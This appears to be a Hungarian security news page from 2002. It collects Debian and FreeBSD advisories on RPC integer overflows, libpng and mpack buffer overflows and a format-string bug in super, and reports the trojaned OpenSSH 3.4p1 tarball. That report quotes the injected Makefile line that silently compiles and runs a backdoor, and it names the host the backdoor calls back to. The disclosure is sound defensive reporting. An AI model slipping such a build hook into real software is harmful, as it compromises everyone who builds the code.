Bug

DSA 143-1 Az új krb5 csomagok javítják az ''egész''-túlcsordulási hibát

Címkék

Csomag: krb5

Sebezhetőség: egész túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem

CERT hibajegy: VU#192995



Egy egész túlcsordulási hibát találtak az RPC könyvtárban, amit a Kerberos 5 adminisztrációs rendszer is használ. Az említett RPC könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni jogosulatlan root szerzésre egy KDC hoszton. Úgy hiszik, hogy a támadónak autentikálnia kell tudnia magát a kadmin démon felé, hogy a támadása sikeres legyen. Jelenleg nem ismeretes létező törés.A problémát javítja az 1.2.4-5woody1 verzió az aktuális stabil disztribúcióban (woody) és az 1.2.5-2 az unstable disztribúcióban (sid). A Debian 2.2 (potato) nem érintett, lévén az nem tartalmazza a krb5 csomagokat.


Javasoljuk, azonnal frissítsd a kerberos csomagjaid.

Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

DSA 142-1 Az új OpenAFS csomagok javítják az ''egész''túlcsordulási hibát

Címkék

Csomag: openafs

Sebezhet?ség: egész túlcsordulás

Proobléma-típus: távoli

Debian-specifikus: nem



Egy egész túlcsordulási hibát fedeztek fel az RPC könyvtárban amit az OpenAFS adatbázisszerver használ, és az említett könyvtár a SunRPC könyvtárból származik. Ezt a hibát ki lehet használni hogy összeomlasszunk bizonyos OpenAFS szervereket (volserverr, vlserverr, ptserver, buserver) vagy jogosulatlanul root hozzáférést szerezzünk, egy olyan gépen, ami futtatja a fenti processzek valamelyikét. Még nem ismeretes léteez? exploit a hibára.A problémát javítja az 1.2.3final2-6 verzió az aktuális stabil disztribúcióban (woody) és a 1.2.6-1 verzió az aktuális unstabil disztribúcióban (sid).

A Debian 2.2 (potato) nem érintett, lévén az még nem tartalmazza az OpenAFS csomagokatt.



Javasoljuk, hogy frissítsd az OpenAFS csomagjaid.

Martin Schultze levele a debian-security-announce listán.

A frissítésr?l szóló FAQ-nk.

DSA 140-2 Az új libpng csomagok javítanak egy lehetséges puffertúlcsordulást

Címkék

Csomag: libpng, libpng3

Sebezhetőség: Puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



Kiegészítésként a DSA-140-1-es biztonsági hibajegyhez az alábbi csomagok javítást tartalmaznak egy lehetséges puffer-túlcsordulási hibára. A PNG könyvtár megvalósít egy biztonsági-ráhagyást, amit szintén betettek az "upstream" kiadásba. Köszönet illeti Glenn Randers-Pehrson-t, aki informálta a Debian Security Team-et.A problémát javítja az 1.0.12-3.woody.2 libpng verzió és az 1.2.1-1.1.woody.2 -es libpng3 verzió az aktuális stabil disztribúcióban (wooddy).



Javasoljuk, hogy frissítsd a libpng csomagjaid.



Martin Schultze levele a debian-security-announce listán.

A frissítésről szóló FAQ-nk.

DSA 141-1 mpack puffer túlcsordulás

Címkék

Csomag: mpack

Sebezhetőség: buffer overflow

Probléma típusa: távoli

Debian specifikus: nem




Eckehard Berns egy nem debian specifikus puffertúlcsordulást felfedezett fel a mupack programban, amit binaris - MIME dekódoláshoz használnak e-mail-ekben. Ezzel a hibával akár tetszőleges kód is lefuttatható. Azonnali frissítés javasolt...A problémát az 1.5-5potato2 csomag javítja a régi stabil disztribúcióban (potato), az 1.5-7woody2 csomag javítja az aktuális stabil disztribúcióban (woody), és az 1.5-9 csomag javítja az unstable disztribúcióban (sid).

Debian Security listán megjelent hír

Niels Provos: OpenSSH Security Advisory: Trojaned Distribution Files

Címkék

Niels Provos bejelentette a trójai OpenSSH dolgot a security-announce@, misc@ és announce@ OpenBSD listákon. Mint kiderült több csomag is érintett. Az érintett verziók:

  • OpenSSH version 3.2.2p1
  • OpenSSH version 3.4p1
  • OpenSSH version 3.4

A backdooros stuff július 30. és július 31. között került a szerverekre, és onnan kerültek át más szerverekre a normál mirrorozási folyamattal.

Kapcsolódó cikkek:
OpenSSH hiba ismét!
OpenSSH trójai!

DSA 140-1 Az új libpng csomagok javítják a puffertúlcsordulást

Címkék

Csomag: libpng2, libpng3

Támadhatóság: puffer-túlcsordulás

Probléma-típus: távoli

Debian-specifikus: nem



A PNG könyvtár fejlesztői kijavították a puffer-túlcsordulási hibát a progresszív olvasójában, ami akkor jön elő, ha a PNG adatfolyam több IDAT adatot tartalmaz mint amennyit az "IHDR chunk" jelez. Ilyen előkészített helytelen adatfolyamok összeomlasztják az alkalmazást, ami esetleg lehetővé teszi a támadó számra, hogy szabotáló kódot futtasson. Az olyan programok, mint a Galeon, Konqueror és számos más egyéb program használják ezeket a könyvtárakat.Hogy megtudd, hogy mely csomagok függenek ettől a könyvtártól futtasd a következő parancsokat:

    apt-cache showpkg libpng2
    apt-cache showpkg libpng3

DSA 139-1 Az új super csomagok javítják a helyi root exploitot

Címkék

Csomag: super

Támadhatóság: format string vulnerability

Probléma típus: helyi

Debian-specifikus: nem



A GOBBLES talált egy nem biztonságos használati módot a super csomag formátumsztringjeiben. A szuper nevű program arra való, hogy megfelelő rendszer-felhasználókhoz való hozzáférst adjon az néhány felhasználónak, úgy mint a szuper nevű program. (megj. most én nem értem rendesen az eredeti angol mondatot, vagy tényleg ilyen önrekurzív hülye módon fogalmazták meg? :-)) Kihasználva ezt a formátumsztring-támadhatóságot, a helyi felhasználók jogosulatlanul root hozzáférést szerezhetnek.A problémát a 3.12.2-2.1 javítja a régi stabil disztribúcióban (potato), a 3.16.1-1.1 javítja az aktuális stabil disztribúcióban (woody), és a 3.18.0-3 javítja az unstable disztribúcióban (sid).



Megj.: Olyan gyorsak voltunk, hogy a hír, még a debian-security archívumába se került be, de ha bekerül, vsz. ezen a linken fogod megtalálni :-)

OpenSSH trójai!

Címkék

A portolható OpenSSH forráskódjában trójai kódot fedezett fel Edwin Groothuis. Az ftp.openbsd.org-on és annak tükrein elérhető fájl MD5 ellenőrzőösszege:

MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

míg az eredeti fájlé:

MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

Az eredetihez képest az openssh-3.4p1/openbsd-compat/Makefile.in fájl változott meg, amelyhez a következő sort adták:

all: libopenbsd-compat.a
+ @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

A bf-test.c fájl a portolható OpenSSH forráskódjában soha nem szerepelt és a Makefile.in CVS információi is kitaláltak, így a gyanú beigazolódni látszik.
A bf-test valójában egy shell scriptet állít elő, amely egy C forráskódot tartalmaz. A lefordított kód a 203.62.158.32-es (web.snsonline.net) IP cím 6667-es portjára kapcsolódik és távolról vezérelhetővé válik.

OpenSSH hiba ismét!

Címkék

Ismét bebizonyosodott, hogy semmi sem tökeletes. Még a "javított" OpenSSH sem... Egy igen érdekes levelet lehet olvasni a freebsd-security@ levlistán. A levél írója szerint a 3.4-es OpenSSH BACKDOOR-os! Mindenki nézzen utána a kérdesnek, gyakorlatilag megint nem vagyunk biztonságban.

Olvasd el a levelet itt.

FreeBSD Security Advisory FreeBSD-SA-02:34.rpc

Címkék

Topic: Sun RPC XDR dekóder 'buffer overflow' hibát tartalmaz

Kategória: core

Modul: libc

Bejelentve: 2002-07-31

Közreműködők: ISS X-Force

Érintett rendszerek: Az összes FreeBSD kiadás, beleértve a 4.6.1-RELEASE-p3 -at is

Javítva:


2002-07-31 14:45:29 UTC (RELENG_4)

2002-07-31 14:47:02 UTC (RELENG_4_6)

2002-07-31 14:49:18 UTC (RELENG_4_5)

2002-07-31 14:50:18 UTC (RELENG_4_4)


FreeBSD specifikus: nem

A bejelentés:A bejelentés:

=========================================

FreeBSD-SA-02:34.rpc Security Advisory The FreeBSD Project

Topic: Sun RPC XDR decoder contains buffer overflow

Category: core

Module: libc

Announced: 2002-07-31

Credits: ISS X-Force

Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p3

Corrected: 2002-07-31 14:45:29 UTC (RELENG_4)

2002-07-31 14:47:02 UTC (RELENG_4_6)

2002-07-31 14:49:18 UTC (RELENG_4_5)

2002-07-31 14:50:18 UTC (RELENG_4_4)

FreeBSD only: NO

I. Background

Sun RPC is a remote procedure call framework which allows clients to invoke procedures in a server process over a network somewhat transparently. XDR is a mechanism for encoding data structures for use with RPC. NFS, NIS, and many other network services are built

upon Sun RPC.

The FreeBSD C runtime library (libc) contains an XDR encoder/decoder derived from Sun's RPC implementation.

II. Problem Description

An error in the calculation of memory needed for unpacking arrays in the XDR decoder can result in a heap buffer overflow.

III. Impact

Any application using Sun RPC may be vulnerable to the heap buffer overflow. Depending upon the application, this vulnerability may be exploitable and lead to arbitrary code execution.

Though no exploits are known to exist currently, many RPC-based services run as the superuser (such as NFS, the NIS server, rpc.statd, and others) and thus this vulnerability should be considered high-risk.

No RPC-based services are enabled by default in FreeBSD installations.

IV. Workaround

Do not run any RPC-based services. The RPC-based services running on a machine may be determined by:

# rpcinfo -p

To disable any RPC-based services at next boot, add (or change if it is already present) the following lines in /etc/rc.conf:

portmap_enable="NO"

nfs_client_enable="NO"

nfs_server_enable="NO"

nis_client_enable="NO"

nis_server_enable="NO"

V. Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p4, 4.5-RELEASE-p12, or 4.4-RELEASE-p19).

2) To patch your present system:

The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems.

a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch

# fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch.asc

b) Execute the following commands as root:

# cd /usr/src

# patch

c) Recompile the operating system as described in

[URL:http://www.freebsd.org/doc/handbook/makeworld.html].

Note that any statically linked applications that are not part of the base system (i.e. from the Ports Collection or other 3rd-party sources) must be recompiled if they use Sun RPC.

All affected applications must be restarted in order to use the corrected library. Though it is not required, rebooting may be the easiest way to accomplish this.

VI. Correction details

The following list contains the revision numbers of each file that was corrected in FreeBSD.

Path Revision Branch

----------------------------------------------------------------

src/lib/libc/xdr/xdr_array.c

RELENG_4 1.8.2.2

RELENG_4_6 1.8.10.2

RELENG_4_5 1.8.8.2

RELENG_4_4 1.8.6.2

src/sys/conf/newvers.sh

RELENG_4_6 1.44.2.23.2.9

RELENG_4_5 1.44.2.20.2.13

RELENG_4_4 1.44.2.17.2.18

-----------------------------------------------------------------

VII. References

[URL:http://online.securityfocus.com/archive/1/285308]

[URL:http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20823]